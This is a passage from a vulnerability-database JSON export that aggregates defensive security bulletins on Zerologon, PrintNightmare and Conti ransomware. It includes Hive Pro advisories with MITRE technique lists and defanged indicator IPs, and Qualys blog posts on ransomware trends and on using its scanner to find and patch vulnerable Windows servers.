"THREATPOST:A5FC4C5797CA53E30A3426AF0843BFFE", "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F60D403369A535076F39A474F74C925E", "THREATPOST:F9CF34A304B5CA2189D5CEDA09C8B0CB"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:8A87E8F1BA63B9BB2E84C23288C44FDC", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "ubuntu", "idList": ["USN-4510-1", "USN-4510-2", "USN-4559-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1472"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27803", "1337DAY-ID-33313"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-0144", "epss": "0.974730000", "percentile": "0.999300000", "modified": "2023-03-17"}, {"cve": "CVE-2020-1472", "epss": "0.973850000", "percentile": "0.998170000", "modified": "2023-03-17"}, {"cve": "CVE-2021-34527", "epss": "0.970380000", "percentile": "0.995570000", "modified": "2023-03-17"}], "vulnersScore": 10.6}, "_state": {"dependencies": 1659988328, "score": 1684011499, "epss": 1679159933}, "_internal": {"score_hash": "cabc9f7d62b8570fb8fe0fa5aa541096"}}

{"hivepro": [{"lastseen": "2021-09-26T09:19:08", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/09/TA202137.pdf>)\n\nConti Ransomware targets enterprises who have not patched their systems by exploiting old vulnerabilities. Conti Ransomware steals sensitive information from businesses and demands a ransom in exchange. CISA has issued a warning about the rise in Conti ransomware attacks. To avoid becoming a victim of Conti ransomware, the Hive Pro Threat Research team suggested you patch these vulnerabilities.\n\nThe techniques used by the Conti includes:\n\n * T1078 - Valid Accounts\n * T1133 - External Remote Services\n * T1566.001 - Phishing: Spearphishing Attachment\n * T1566.002 - Phishing: Spearphishing Link\n * T1059.003 - Command and Scripting Interpreter: Windows Command Shell\n * T1106 - Native API\n * T1055.001 - Process Injection: Dynamic-link Library Injection\n * T1027 - Obfuscated Files or Information\n * T1140 - Deobfuscate/Decode Files or Information\n * T1110 - Brute Force\n * T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting\n * T1016 - System Network Configuration Discovery\n * T1049 - System Network Connections Discovery\n * T1057 - Process Discovery\n * T1083 - File and Directory Discovery\n * T1135 - Network Share Discovery\n * T1021.002 - Remote Services: SMB/Windows Admin Shares\n * T1080 - Taint Shared Content\n * T1486 - Data Encrypted for Impact\n * T1489 - Service Stop\n * T1490 - Inhibit System Recovery\n\n#### Actor Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/09/1-2-1024x245.png)\n\n#### Vulnerability Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/09/2-3.png)\n\n#### Indicators of Compromise (IoCs)\n\n**Type** | **Value** \n---|--- \nIPV4 | 162.244.80[.]235 \n85.93.88[.]165 \n185.141.63[.]120 \n82.118.21[.]1 \n \n#### Patch Links\n\n<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>\n\n#### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa21-265a>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-09-23T13:47:51", "type": "hivepro", "title": "Are you a victim of the Conti Ransomware?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-34527"], "modified": "2021-09-23T13:47:51", "id": "HIVEPRO:8DA601C83DB9C139357327C06B06CB36", "href": "https://www.hivepro.com/are-you-a-victim-of-the-conti-ransomware/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-22T07:28:58", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have issued an alert for enterprises that Russian state-sponsored cyber attackers have obtained network access by exploiting default MFA protocols and a known vulnerability. Russian state-sponsored cyber attackers got initial access to the target organization by using compromising credentials and registering a new device in the organization's Duo multi-factor authentication (MFA). The actors obtained the credentials using a brute-force password guessing attack, which provided them with access to a victim account with a basic, predictable password. The victim account had been unenrolled from Duo after a long period of inactivity, but it had not been deactivated in Active Directory. The actors were able to enroll a new device for this account, satisfy the authentication requirements, and get access to the victim network since Duo's default configuration settings allow for the re-enrollment of a new device for inactive accounts. Using the stolen account, Russian state-sponsored cyber attackers gained administrator rights by exploiting the "PrintNightmare" vulnerability (CVE-2021-34527). Furthermore, the cyber actors were able to obtain required material by moving laterally to the victim's cloud storage and email accounts. The organizations can apply the following mitigations: To prevent against "fail open" and re-enrollment scenarios, enforce MFA and examine configuration restrictions. Assure that inactive accounts are deactivated consistently across the Active Directory and MFA systems. Ensure that inactive accounts are deactivated equally across Active Directory, MFA systems, and other systems. Update software such as operating systems, apps, and hardware on a regular basis. The Mitre TTPs used in the current attack are:TA0001 - Initial AccessTA0003 - PersistenceTA0004 - Privilege EscalationTA0005 - Defense EvasionTA0006 - Credential AccessTA0007 - DiscoveryTA0008 - Lateral MovementTA0009 - CollectionT1078: Valid AccountsT1133: External Remote ServicesT1556: Modify Authentication ProcessT1068: Exploitation for Privilege EscalationT1112: Modify RegistryT1110.001: Brute Force: Password GuessingT1003.003: OS Credential Dumping: NTDST1018: Remote System DiscoveryT1560.001: Archive Collected Data: Archive via Utility Vulnerability Details Indicators of Compromise (IoCs) Patch Link https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 References https://www.cisa.gov/uscert/ncas/alerts/aa22-074a", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-18T13:58:03", "type": "hivepro", "title": "Russian threat actors leveraging misconfigured multifactor authentication to exploit PrintNightmare vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-18T13:58:03", "id": "HIVEPRO:8D09682ECAC92A6EA4B81D42F45F0233", "href": "https://www.hivepro.com/russian-threat-actors-leveraging-misconfigured-mfa-to-exploit-printnightmare-vulnerability/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-27T12:25:56", "description": "For a detailed threat digest, download the pdf file here Summary HiveForce Labs recently made several significant discoveries related to cybersecurity threats. Over the past week, the fact that there were a total of twelve attacks executed, taking advantage of seventeen different vulnerabilities in various systems, and involving four different adversaries highlights the ever-present danger of cyberattacks. Interestingly, out of seventeen vulnerabilities, five are part of the known exploited vulnerability catalog by CISA. Moreover, HiveForce Labs also found that Flea APT threat group was exploiting a three-year-old Microsoft Netlogon vulnerability (CVE-2020-1472). Furthermore, a new info stealer called FadeStealer has been identified, which has various features of information theft capabilities. In addition to these threats, there is also a Romanian threat group \u201cDiicot\u201d which has been actively employing SSH brute-forcing and deploying malware loaders to compromise systems for the purpose of cryptocurrency mining. All these attacks were observed to be on the rise, posing a significant threat to users all over the world. For a detailed threat digest, download the pdf file here", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-06-27T11:07:09", "type": "hivepro", "title": "Attacks, Vulnerabilities and Actors 19 June to 25 June 2023", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2023-06-27T11:07:09", "id": "HIVEPRO:A9AF072A11E6D314ED458ACFFE3BDFD3", "href": "https://www.hivepro.com/attacks-vulnerabilities-and-actors-19-june-to-25-june-2023/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-05-05T07:29:09", "description": "_The FBI has published its annual report on Internet crime. Qualys has analyzed its trends and statistics. In this post, we review our findings, especially with regards to the prevalence of Ransomware, and our recommendations for actions that enterprises should take to mitigate their risk._\n\nEvery year the U.S. Federal Bureau of Investigation publishes [an Internet crime report](<https://www.ic3.gov/Media/PDF/AnnualReport/2021_IC3Report.pdf>) which summarizes its insights on trends and threats from cybercriminals based on all cybercrimes reported to the FBI by the American public. This annual report provides fascinating insights into the threat landscape, key trends, statistics on types of crimes, the real losses resulting from them, and perhaps most importantly, key insights into how cybercriminals operate so that we can better prepare to guard against them.\n\nFor 2021 the FBI reported 5 key threats:\n\n 1. Business Email Compromise (BEC)\n 2. Confidence Fraud / Romance Scams\n 3. Cryptocurrency\n 4. Ransomware\n 5. Tech Support Fraud\n\nOf these threats, only ransomware complaints continue to rise. Ransomware reports increased by almost 51% compared to 2020.\n\nThese complaints resulted in a total of $50 million in losses in 2021, compared to $30 million in 2020\u2014a 66% rise in total losses. Ransomware attacks hit more than [290 enterprises in 2021](<https://www.zdnet.com/article/more-than-290-enterprises-hit-by-6-ransomware-groups-in-2021/>), including major organizations like [Colonial Pipeline](<https://www.bbc.com/news/business-57178503>), [Accenture](<https://cybersecurityworks.com/blog/ransomware/csw-analysis-accenture-attacked-by-lockbit-2-0-ransomware.html>), [Acer](<https://www.bleepingcomputer.com/news/security/computer-giant-acer-hit-by-50-million-ransomware-attack/>), and [others](<https://illinois.touro.edu/news/the-10-biggest-ransomware-attacks-of-2021.php>).\n\n### Top Ransomware Attack Vectors of 2021\n\nRansomware tactics and techniques are evolving continuously, allowing attackers to make their exploits more sophisticated, resulting in an increasing ransomware threat to organizations globally. Although cybercriminals use a variety of techniques to infect victims with ransomware, the top three initial infection vectors reported remain phishing emails, Remote Desktop Protocol (RDP) exploitation, and software vulnerabilities.\n\n* * *\n\n****Get instant visibility into ransomware exposure with Qualys Cloud Platform****\n\n[Try it Now](<https://www.qualys.com/forms/ransomware/>)\n\n* * *\n\n#### Top Ransomware Variants Exploited Vulnerabilities\n\nThe FBI\u2019s investigations isolated the top 3 ransomware variants that victims suffered: CONTI, LockBit, and REvil/Sodinokibi. The chart below tallies the number of incidents reported for each variant:\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Top-Ransomware-Varaiants-1070x582.png)Source: FBI\n\nThe report states, "_According to information submitted to the Internet Crime Complaint Center (IC3), CONTI most frequently victimized the Critical Manufacturing, Commercial Facilities, and Food and Agriculture sectors. LockBit most frequently victimized the Government Facilities, Healthcare/Public Health, and Financial Services sectors. REvil/Sodinokibi most frequently victimized Financial Services, Information Technology, and Healthcare/Public Health sectors._"\n\nThe increase in remote work due to the Pandemic made four specific infection vectors more popular. Typical delivery methods for these ransomware variants were:\n\n * **Spear phishing** \u2013 campaigns using tailored emails that contain malicious attachments or malicious links\n * **Remote Desktop Protocol (RDP)** credentials that are either stolen or weak\n * **Fake software** promoted via search engine optimization that tempts users to install\n * **Common vulnerabilities** exploited in external IT assets\n\nHere are a few examples of vulnerabilities exploited in 2021 to launch successful ransomware attacks.\n\n##### Conti\n\n * "PrintNightmare" vulnerability ([CVE-2021-34527](<https://media.defense.gov/2021/Sep/22/2002859507/-1/-1/0/CSA_CONTI_RANSOMWARE_20210922.PDF>)) in Windows Print spooler service\n * "Zerologon" vulnerability ([CVE-2020-1472](<https://media.defense.gov/2021/Sep/22/2002859507/-1/-1/0/CSA_CONTI_RANSOMWARE_20210922.PDF>)) in Microsoft Active Directory Domain Controller systems\n\n##### LockBit\n\n * [CVE-2021-22986](<https://cybersecurityworks.com/blog/ransomware/csw-analysis-accenture-attacked-by-lockbit-2-0-ransomware.html>) is a critical unauthenticated, remote code execution vulnerability in the iControl REST interface, affecting BIG-IP and BIG-IQ products. It was used in the [Accenture attack](<https://cybersecurityworks.com/blog/ransomware/csw-analysis-accenture-attacked-by-lockbit-2-0-ransomware.html>).\n\n##### REvil/Sodinokibi\n\n * [CVE-2018-8453](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453>) vulnerability is exploited to elevate privileges\n\n### Recommended Ransomware Mitigations\n\n##### Update your operating system and software\n\nInternet-facing servers should be patched for known vulnerabilities regularly, as well as software processing internet data such as web browsers, browser plugins, and document readers. Software and operating systems should be upgraded regularly to the latest available version. The highest priority should be patching software and operating systems running versions that vendors no longer support.\n\n##### Implement user training and phishing exercises to raise awareness about the risks of suspicious links and attachments. Do not click on suspicious links!\n\nUser training has been proven to teach employees to avoid ransomware attacks from phishing and fake software.\n\n##### If you use Remote Desktop Protocol (RDP), secure and monitor it\n\nLimit access to resources over internal networks and monitor RDP access logs. Ensure devices are properly configured, and security features are enabled.\n\n##### Make an offline backup of your data\n\nRegularly run and maintain offline encrypted backups, then test them. Review the backup schedule of your organization and consider the possible backup disruption risk during weekends and holidays.\n\n##### Use strong passwords\n\nEnsure you have a strongly defined password policy, and ensure it is followed across the organization.\n\n##### Use multi-factor authentication\n\nApply multi-factor authentication (MFA) for all services to the extent possible, particularly for remote access, virtual private networks, and accounts that access critical systems.\n\n##### Secure your network(s): implement segmentation, filter traffic, and scan ports\n\nThe most critical communications should be occurring in the most secure and reliable layer. Filter network traffic to prohibit ingress and egress communications with known malicious IP addresses.\n\nBlacklist the malicious URLs/websites. Scan networks for open and listening ports regularly and close those that are unnecessary.\n\n### How Can Qualys Help?\n\n##### Comprehensive Visibility into Critical Ransomware Risk Exposure\n\nGetting a complete view of your ransomware risk exposure is a big challenge. [Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) helps you gain comprehensive visibility into the vulnerabilities, misconfiguration postures, and unauthorized software installed on all assets across your enterprise. Along with that, you gain visibility into available patches and can deploy these patches on the assets impacted. Our dashboard provides a glimpse of critical ransomware risk exposure across your enterprise in one unified console.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Ransomware-Exposure-Dashaboard.png)\n\n##### Continuous Detection & Prioritization for Ransomware-specific Vulnerabilities\n\nThe first step toward securing your devices from ransomware is to get complete visibility of all assets in your organization. [Qualys CSAM](<https://www.qualys.com/apps/cybersecurity-asset-management/>) provides "single pane of glass" visibility of all asset types and helps to eliminate any blind spots. You also get visibility into unmanaged assets\n\nThe FBI\u2019s 2021 report clarifies that exploitation of software vulnerabilities remains one of the top three initial infection vectors for ransomware incidents. Most noteworthy is that the top vulnerabilities are exploited using fake software and/or software versions no longer supported by the vendor. CSAM provides visibility into unauthorized and end-of-life software. An unauthorized software list helps you identify fake software that has been installed from unknown sources. \n\n* * *\n\n****Get instant visibility into ransomware exposure with Qualys Cloud Platform****\n\n[Try it Now](<https://www.qualys.com/forms/ransomware/>)\n\n* * *\n\nQualys VMDR helps you to monitor and detect ransomware vulnerabilities continuously. You can view the ransomware vulnerabilities detected on assets on which unauthorized software is running using Qualys Query Language (QQL):\n \n \n Asset dropdown - software:(authorization:Unauthorized) \n Vulnerability dropdown - vulnerabilities.vulnerability.threatIntel.ransomware:true\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Unauhtorized-software-vulnerabilities-latest-1070x602.jpg)\n\nYou can also identify all of the assets on which 2021\u2019s top three ransomware variants are detected: CONTI, LockBit, and REvil/Sodinokibi.\n\nQQL details are:\n \n \n (vulnerabilities.vulnerability.threatIntel.ransomware:true) and (vulnerabilities.vulnerability.ransomware.name:[REvil/Sodinokibi, Ryuk/Conti, lockBit])\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Search-Top-Ransomware-Vuln_new_Latest-1070x602.png)\n\nUsing Qualys VMDR prioritization, ransomware vulnerabilities can be easily prioritized by using "Ransomware" in the Real-Time Threat Indicator (RTI) filter section:\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Ransomware-Prioritization-Latest-1070x602.jpg)\n\nAlong with vulnerabilities, Qualys VMDR also keeps you up to date on evolving threats via its 'Live Threat Feed', which can help with prioritization. The "Live Threat Feed" provides visibility of high, medium, and low-rate feeds along with a count of the impacted assets. Click on the count to view more details about the impacted assets.\n\nIn the "Threat Feed" tab, search using `contents:ransomware` to find all threats associated with ransomware.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Threat_feed.png)\n\n##### Discover and Mitigate Ransomware Misconfigurations\n\nMisconfigurations often play a vital role in ransomware attacks, as they might help the attacker gain access to your assets. [Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) provides comprehensive visibility into ransomware misconfigurations. The Ransomware Best Practices policy contains the critical controls mapped to MITRE ATT&CK mitigations as well as tactics recommended by [CISA](<https://us-cert.cisa.gov/ncas/alerts/aa21-131a>) and best practices published by [Fireye Mandiant](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf>). These mitigations are effective across top techniques and can potentially reduce the risk of ransomware attacks. These critical controls can limit attackers' initial access and lateral movement around your network.\n\nApply this ransomware policy to all assets across your enterprise to ensure that all assets are correctly configured. You can automate the configurations assessment and apply this to the golden images to confirm your security baselines before distribution.\n\nQualys Policy Compliance helps you to configure the recommended mitigations for the password, RDP, network security policy, and software update by applying the ransomware policies on the impacted assets.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Policy-Compliance.png)\n\n##### Automated Effortless Patching for Ransomware Vulnerabilities\n\nQualys [zero-touch patching](<https://blog.qualys.com/product-tech/2021/09/14/optimize-vulnerability-remediation-with-zero-touch-patch>) helps you automatically patch new ransomware-related vulnerabilities that are being actively exploited in attacks. It is faster and more accurate than manual patching and helps to patch up to 97% of ransomware vulnerabilities.\n\n[Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) provides a more efficient and effective way to proactively patch detected ransomware vulnerabilities. Qualys VMDR helps prioritize the ransomware vulnerabilities that Qualys PM executes. This tight integration enables you to initiate patch jobs directly from the Prioritization tab. Quick patching of critical ransomware vulnerabilities reduces ransomware risk. Auto-correlation of patches against the ransomware vulnerabilities detected reduces your overall remediation time and makes the IT team\u2019s job easier.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Patch-Management_Latest-1070x602.jpg)\n\nReady to hear more? For more details, [watch this video](<https://vimeo.com/617379785>) on our Ransomware offering. Then try out our [Ransomware Risk Assessment & Remediation Service](<https://www.qualys.com/forms/ransomware/>) at no cost for 60 days. Uncover your organization\u2019s level of exposure and create a prescribed patch plan to reduce your ransomware risk.\n\n* * *\n\n****Get instant visibility into ransomware exposure with Qualys Cloud Platform****\n\n[Try it Now](<https://www.qualys.com/forms/ransomware/>)\n\n* * *", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-04T09:40:56", "type": "qualysblog", "title": "Ransomware Insights from the FBI\u2019s 2021 Internet Crime Report", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8453", "CVE-2020-1472", "CVE-2021-22986", "CVE-2021-34527"], "modified": "2022-05-04T09:40:56", "id": "QUALYSBLOG:5A5094DBFA525D07EBC3EBA036CDF81A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-02T12:43:58", "description": "**Update October 1, 2020**: Microsoft has [added step-by-step Zerologon patching instructions ](<https://www.databreachtoday.com/microsoft-issues-updated-patching-directions-for-zerologon-a-15090>)because the original instructions "proved confusing to users and may have caused issues with other business operations."\n\n**Update October 1, 2020**: Qualys released new QID 91680 to add a remote (unauthenticated) check for the Zerologon vulnerability. The update is included in VULNSIGS-2.4.998-3 and later. \n\n_`QID 91680 : Microsoft Windows Netlogon Elevation of Privilege Vulnerability (unauthenticated check)`_\n\n**Update Sept 24, 2020**: Microsoft is detecting [active attacks leveraging the Zerologon vulnerability](<https://www.zdnet.com/article/microsoft-says-it-detected-active-attacks-leveraging-zerologon-vulnerability/>). Security teams are advised to patch vulnerable systems immediately.\n\nOn Sept 11, 2020, A Dutch team, collectively known as Secura, published an [exploit](<https://github.com/SecuraBV/CVE-2020-1472>) on how an unauthenticated remote user can take control over the domain controller and leverage admin privileges. The vulnerability ([CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)) received the maximum severity rating score of 10.0 based on CVSS v3 Scoring system.\n\nThe prime elements of this vulnerability are the weak encryption standards and the authentication process used in the Netlogon protocol. As new Windows Domain Controllers use standard AES-256 as encryption standards, incorrect use of the AES mode results in spoofing the identity of any computer (DC) account and replace it with all zeroes or empty passwords. As the final output replaces all characters of the password with zeroes, this bug is also well-known as \u201cZerologon\u201d.\n\n**Affected Products**\n\n * Windows Servers 2008\n * Windows Servers 2012 R2\n * Windows Servers 2016\n * Windows Servers 2019\n\nA complete list of affected devices is available on Microsoft\u2019s August 2020 security [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>).\n\n### Identification of Assets using Qualys VMDR\n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify Windows systems.\n\n_`(operatingSystem.category1:``Windows`` and operatingSystem.category2:``Server``)`_\n\n![](https://blog.qualys.com/wp-content/uploads/2020/09/Screen-Shot-2020-09-15-at-8.09.56-AM-1070x497.png)\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, let\u2019s say \u2013 "Zerologon". This helps in automatically grouping existing hosts with Zerologon as well as any new Windows server that spins up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>). \n\n### Discover Zerologon "CVE-2020-1472" Vulnerability\n\nNow that hosts with Zerologon are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like Zerologon based on the always updated Knowledgebase.\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Zerologon\u2019 asset tag in the vulnerabilities view by using this QQL query:\n\n_`vulnerabilities.vulnerability.qid:91668`_\n\nOR you could modify your search to :\n\n_`Vulnerability - vulnerabilities.vulnerability.qid:91668`_\n\n_`Asset - (operatingSystem.category1:``Windows`` and operatingSystem.category2:``Server``)`_\n\nThis will return a list of all impacted hosts.\n\n![](https://blog.qualys.com/wp-content/uploads/2020/09/Screen-Shot-2020-09-15-at-8.12.14-AM-1-1070x441.png)\n\nQID 91668 is available in signature version VULNSIGS-2.4.958-3 and above and can be detected using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.4.958.3-2 and above.\n\nAlong with the QID 91668, Qualys released the following IG QID 45461 to help customers track domain controller assets on which netlogon secure channel mode is enabled. This QID can be detected using authenticated scanning using VULNSIGS-2.4.986-3 and above or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.4.986.3-2 and above. \n\n_`QID 45461 : Microsoft Windows Domain Controller Netlogon Secure Channel Enforcement Mode Enabled`_\n\n**Update October 1, 2020**: Qualys released new QID 91680 to add a remote (unauthenticated) check for the Zerologon vulnerability. The update is included in VULNSIGS-2.4.998-3 and later.\n\n_`QID 91680 : Microsoft Windows Netlogon Elevation of Privilege Vulnerability (unauthenticated check)`_\n\nPlease Note: We have tested the QID across Qualys lab environment on a variety of Windows versions, and we have not observed any issues. In case you experience issues with the remote detection, please reach out to Qualys Support for immediate attention.\n\nUsing VMDR, the Zerologon vulnerability can be prioritized for the following real-time threat indicators (RTIs):\n\n * Remote Code Execution\n * Privilege Escalation\n * Exploit Public\n * Active Attack\n * Denial of Service\n * High Data Loss\n * High Lateral Movement\n * Predicted High Risk\n![](https://blog.qualys.com/wp-content/uploads/2020/09/Screen-Shot-2020-09-15-at-4.57.33-PM-1070x577.png)\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\n![](https://blog.qualys.com/wp-content/uploads/2020/09/Screen-Shot-2020-09-15-at-9.35.25-AM-1070x656.png)\n\nSimply click on the impacted assets for the Zerologon threat feed to see the vulnerability and impacted host details. \n\nWith VMDR Dashboard, you can track Zerologon, impacted hosts, their status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of Zerologon vulnerability trends in your environment using [Zerologon Dashboard Link](<https://qualys-secure.force.com/customer/s/article/000006405>).\n\n![](https://blog.qualys.com/wp-content/uploads/2020/09/DASHBOARD-1070x908.png)\n\n### Response by Patching and Remediation \n\nVMDR rapidly remediates the Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select \u201cqid: 91668\u201d in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go for hosts grouped together by a tag \u2013 Zerologon. \n\n![](https://blog.qualys.com/wp-content/uploads/2020/09/Screen-Shot-2020-09-15-at-4.55.00-PM-1-1070x664.png)\n\nFor proactive, continuous patching, you can create a job without a Patch Window to ensure all hosts will continue to receive the required patches as new patches become available for emerging vulnerabilities.\n\nUsers are encouraged to apply patches as soon as possible.\n\n### Solution\n\nUsers are advised to review their Microsoft Windows installations with Microsoft\u2019s August 2020 security [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) mentioned above. For Windows devices, a patch to be published in Feb 2021 would place Domain controllers in enforcement mode; to explicitly allow the account by adding an exception for any non-compliant device.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority Zerologon vulnerability CVE-2020-1472.\n\n### **References**\n\n<https://www.secura.com/pathtoimg.php?id=2055>\n\n<https://github.com/SecuraBV/CVE-2020-1472>\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472>", "cvss3": {}, "published": "2020-09-15T19:55:08", "type": "qualysblog", "title": "Microsoft Netlogon Vulnerability (CVE-2020-1472 \u2013 Zerologon) \u2013 Automatically Discover, Prioritize and Remediate Using Qualys VMDR\u00ae", 